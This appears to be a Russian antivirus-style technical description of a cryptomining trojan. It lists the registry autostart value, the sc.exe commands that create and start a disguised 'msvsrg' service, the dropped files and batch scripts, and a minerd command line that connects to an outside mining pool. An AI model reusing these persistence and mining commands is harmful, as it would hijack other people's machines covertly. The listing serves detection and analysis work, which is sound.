Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\msvsrg] 'Start' = '00000002'
- '%WINDIR%\minerd.exe' --url stratum+tcp://ltc.give-me-coins.com --userpass 35634575685678568.3:3
- '%WINDIR%\msvsrg.exe'
- '<SYSTEM32>\sc.exe' start msvsrg
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\Temp\2.tmp\1.bat" "
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\vk.bat" "
- '<SYSTEM32>\sc.exe' create msvsrg binPath= %WINDIR%\msvsrg.exe start= auto
- %WINDIR%\pthreadGC2.dll
- %WINDIR%\msvsrg.exe
- %WINDIR%\minerd.exe
- %WINDIR%\Temp\2.tmp\1.bat
- %WINDIR%\zlib1.dll
- %WINDIR%\vk.bat
- %WINDIR%\libcurl-4.dll
- %TEMP%\1.tmp\msvsrg.exe
- %TEMP%\1.tmp\minerd.exe
- %TEMP%\1.tmp\vk.bat
- %TEMP%\1.tmp\libcurl-4.dll
- %TEMP%\1.tmp\zlib1.dll
- %TEMP%\1.tmp\pthreadGC2.dll
- %TEMP%\1.tmp\zlib1.dll
- %TEMP%\1.tmp\libcurl-4.dll
- %TEMP%\1.tmp\vk.bat
- %TEMP%\1.tmp\pthreadGC2.dll
- %WINDIR%\Temp\2.tmp\1.bat
- %TEMP%\1.tmp\minerd.exe
- %TEMP%\1.tmp\msvsrg.exe
- 'lt#.###e-me-coins.com':80
- DNS ASK lt#.###e-me-coins.com